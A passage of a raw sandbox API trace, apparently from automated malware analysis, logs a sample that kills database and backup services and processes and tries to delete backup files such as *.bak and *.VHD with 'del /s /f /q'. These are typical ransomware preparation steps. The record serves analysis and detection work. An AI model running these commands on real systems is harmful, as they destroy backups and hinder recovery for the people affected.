(in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0150.321] CoTaskMemFree (pv=0x741d20) [0150.321] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM dbeng50.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff07c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x25097dc | out: lpCommandLine="\"taskkill.exe\" /IM dbeng50.exe /F", lpProcessInformation=0x25097dc*(hProcess=0x47c, hThread=0x504, dwProcessId=0xc94, dwThreadId=0x388)) returned 1 [0150.380] CloseHandle (hObject=0x558) returned 1 [0150.381] GetFileType (hFile=0x4c8) returned 0x3 [0150.381] CloseHandle (hObject=0x504) returned 1 [0150.382] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.796] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.862] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.994] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.029] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.237] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.831] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0154.224] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.995] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0155.995] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x558, hWritePipe=0x63ff134*=0x5dc) returned 1 [0155.995] GetCurrentProcess () returned 0xffffffff [0155.995] GetCurrentProcess () returned 0xffffffff [0155.995] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x550) returned 1 [0155.995] CloseHandle (hObject=0x558) returned 1 [0155.995] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0155.995] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0155.995] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0155.995] CoTaskMemFree (pv=0x741d20) [0155.996] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"del.exe\" /s /f /q e:\\*.VHD e:\\*.bac e:\\*.bak e:\\*.wbcat e:\\*.bkf e:\\Backup*.* e:\\backup*.* e:\\*.set e:\\*.win e:\\*.dsk", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63fefd4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x5dc, hStdError=0x0), lpProcessInformation=0x256fe50 | out: lpCommandLine="\"del.exe\" /s /f /q e:\\*.VHD e:\\*.bac e:\\*.bak e:\\*.wbcat e:\\*.bkf e:\\Backup*.* e:\\backup*.* e:\\*.set e:\\*.win e:\\*.dsk", lpProcessInformation=0x256fe50*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0155.996] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x63fef08, nSize=0x101, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0155.997] CloseHandle (hObject=0x5dc) returned 1 [0155.998] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.008] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.009] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.011] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.012] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.014] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.030] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.180] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.182] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.182] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.285] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.714] CoUninitialize () Thread: id = 549 os_tid = 0x1150 Thread: id = 644 os_tid = 0x1204 [0119.345] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0119.345] CoGetContextToken (in: pToken=0x6daf584 | out: pToken=0x6daf584) returned 0x0 [0119.345] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6daf5a8 | out: ppvObject=0x6daf5a8*=0x6ded34) returned 0x0 [0119.346] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x6daf5d4 | out: pThreadType=0x6daf5d4*=0) returned 0x0 [0119.346] IUnknown:Release (This=0x6ded34) returned 0x1 [0119.346] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0119.346] CoUninitialize () [0120.711] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.711] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x518, hWritePipe=0x6daef04*=0x478) returned 1 [0120.711] GetCurrentProcess () returned 0xffffffff [0120.711] GetCurrentProcess () returned 0xffffffff [0120.711] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x55c) returned 1 [0120.711] CloseHandle (hObject=0x518) returned 1 [0120.711] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.711] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.711] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.711] CoTaskMemFree (pv=0x741d20) [0120.711] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecRPCService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee44*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x268a48c | out: lpCommandLine="\"net.exe\" stop BackupExecRPCService /y", lpProcessInformation=0x268a48c*(hProcess=0x558, hThread=0x518, dwProcessId=0xc90, dwThreadId=0x6c8)) returned 1 [0120.716] CloseHandle (hObject=0x478) returned 1 [0120.716] GetFileType (hFile=0x55c) returned 0x3 [0120.716] CloseHandle (hObject=0x518) returned 1 [0122.977] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0122.977] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x478, hWritePipe=0x6daef04*=0x3cc) returned 1 [0122.977] GetCurrentProcess () returned 0xffffffff [0122.978] GetCurrentProcess () returned 0xffffffff [0122.978] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x3c4) returned 1 [0122.978] CloseHandle (hObject=0x478) returned 1 [0122.978] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0122.978] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0122.978] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0122.978] CoTaskMemFree (pv=0x741d20) [0122.978] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$SBSMONITORING /", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee48*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x2272d14 | out: lpCommandLine="\"net.exe\" stop MSSQL$SBSMONITORING /", lpProcessInformation=0x2272d14*(hProcess=0x464, hThread=0x478, dwProcessId=0xbbc, dwThreadId=0xc10)) returned 1 [0123.464] CloseHandle (hObject=0x3cc) returned 1 [0123.464] GetFileType (hFile=0x3c4) returned 0x3 [0123.465] CloseHandle (hObject=0x478) returned 1 [0124.479] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.479] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x478, hWritePipe=0x6daef04*=0x3cc) returned 1 [0124.480] GetCurrentProcess () returned 0xffffffff [0124.480] GetCurrentProcess () returned 0xffffffff [0124.480] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x514) returned 1 [0124.480] CloseHandle (hObject=0x478) returned 1 [0124.480] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.480] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0124.480] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0124.480] CoTaskMemFree (pv=0x741d20) [0124.480] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$SBSMONITORING /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee44*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x2546520 | out: lpCommandLine="\"net.exe\" stop MSSQL$SBSMONITORING /y", lpProcessInformation=0x2546520*(hProcess=0x544, hThread=0x478, dwProcessId=0xeb0, dwThreadId=0x964)) returned 1 [0124.486] CloseHandle (hObject=0x3cc) returned 1 [0124.487] GetFileType (hFile=0x514) returned 0x3 [0124.487] CloseHandle (hObject=0x478) returned 1 [0128.872] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0128.872] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x3cc, hWritePipe=0x6daef04*=0x444) returned 1 [0128.872] GetCurrentProcess () returned 0xffffffff [0128.872] GetCurrentProcess () returned 0xffffffff [0128.873] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x478) returned 1 [0128.873] CloseHandle (hObject=0x3cc) returned 1 [0128.873] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0128.873] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0128.873] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0128.873] CoTaskMemFree (pv=0x741d20) [0128.873] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop TrueKeyScheduler /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee4c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x444, hStdError=0x0), lpProcessInformation=0x2272604 | out: lpCommandLine="\"net.exe\" stop TrueKeyScheduler /y", lpProcessInformation=0x2272604*(hProcess=0x538, hThread=0x3cc, dwProcessId=0xe18, dwThreadId=0x944)) returned 1 [0128.924] CloseHandle (hObject=0x444) returned 1 [0128.924] GetFileType (hFile=0x478) returned 0x3 [0128.924] CloseHandle (hObject=0x3cc) returned 1 [0133.973] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0133.973] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x444, hWritePipe=0x6daef04*=0x448) returned 1 [0133.974] GetCurrentProcess () returned 0xffffffff [0133.974] GetCurrentProcess () returned 0xffffffff [0133.974] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x4a4) returned 1 [0133.974] CloseHandle (hObject=0x444) returned 1 [0133.974] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0133.974] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0133.974] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0133.974] CoTaskMemFree (pv=0x741d20) [0133.974] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLTELEMETRY /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee50*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2275618 | out: lpCommandLine="\"net.exe\" stop SQLTELEMETRY /y", lpProcessInformation=0x2275618*(hProcess=0x518, hThread=0x444, dwProcessId=0x1008, dwThreadId=0x310)) returned 1 [0133.986] CloseHandle (hObject=0x448) returned 1 [0133.986] GetFileType (hFile=0x4a4) returned 0x3 [0133.986] CloseHandle (hObject=0x444) returned 1 [0135.922] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0135.922] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x448, hWritePipe=0x6daef04*=0x504) returned 1 [0135.922] GetCurrentProcess () returned 0xffffffff [0135.923] GetCurrentProcess () returned 0xffffffff [0135.923] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x200) returned 1 [0135.923] CloseHandle (hObject=0x448) returned 1 [0135.923] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0135.923] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0135.923] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0135.923] CoTaskMemFree (pv=0x741d20) [0135.923] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop TrueKeyServiceHelper /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee44*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x27a3274 | out: lpCommandLine="\"net.exe\" stop TrueKeyServiceHelper /y", lpProcessInformation=0x27a3274*(hProcess=0x174, hThread=0x448, dwProcessId=0xf1c, dwThreadId=0x1280)) returned 1 [0136.100] CloseHandle (hObject=0x504) returned 1 [0136.100] GetFileType (hFile=0x200) returned 0x3 [0136.100] CloseHandle (hObject=0x448) returned 1 [0139.670] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0139.670] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x518, hWritePipe=0x6daef04*=0x4f4) returned 1 [0139.670] GetCurrentProcess () returned 0xffffffff [0139.670] GetCurrentProcess () returned 0xffffffff [0139.670] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x464) returned 1 [0139.670] CloseHandle (hObject=0x518) returned 1 [0139.670] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0139.670] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0139.670] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0139.670] CoTaskMemFree (pv=0x741d20) [0139.671] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLTELEMETRY$ECWDB2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee44*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4f4, hStdError=0x0), lpProcessInformation=0x22768d8 | out: lpCommandLine="\"net.exe\" stop SQLTELEMETRY$ECWDB2 /y", lpProcessInformation=0x22768d8*(hProcess=0x418, hThread=0x518, dwProcessId=0x1084, dwThreadId=0xb60)) returned 1 [0139.728] CloseHandle (hObject=0x4f4) returned 1 [0139.729] GetFileType (hFile=0x464) returned 0x3 [0139.729] CloseHandle (hObject=0x518) returned 1 [0139.729] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.335] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.558] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.626] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.637] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.654] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.664] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.674] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.685] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.692] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.720] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.082] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.269] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.269] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x50c, hWritePipe=0x6daef04*=0x4b0) returned 1 [0147.269] GetCurrentProcess () returned 0xffffffff [0147.269] GetCurrentProcess () returned 0xffffffff [0147.269] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x518) returned 1 [0147.269] CloseHandle (hObject=0x50c) returned 1 [0147.269] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.269] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.269] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.269] CoTaskMemFree (pv=0x741d20) [0147.269] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mydesktopqos.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee44*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x2498af0 | out: lpCommandLine="\"taskkill.exe\" /IM mydesktopqos.exe /F", lpProcessInformation=0x2498af0*(hProcess=0x560, hThread=0x50c, dwProcessId=0xcd4, dwThreadId=0xf80)) returned 1 [0147.736] CloseHandle (hObject=0x4b0) returned 1 [0147.736] GetFileType (hFile=0x518) returned 0x3 [0147.736] CloseHandle (hObject=0x50c) returned 1 [0147.938] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.938] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x50c, hWritePipe=0x6daef04*=0x4b0) returned 1 [0147.938] GetCurrentProcess () returned 0xffffffff [0147.938] GetCurrentProcess () returned 0xffffffff [0147.938] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x174) returned 1 [0147.938] CloseHandle (hObject=0x50c) returned 1 [0147.938] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.938] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.938] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.938] CoTaskMemFree (pv=0x741d20) [0147.939] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM encsvc.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee50*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, 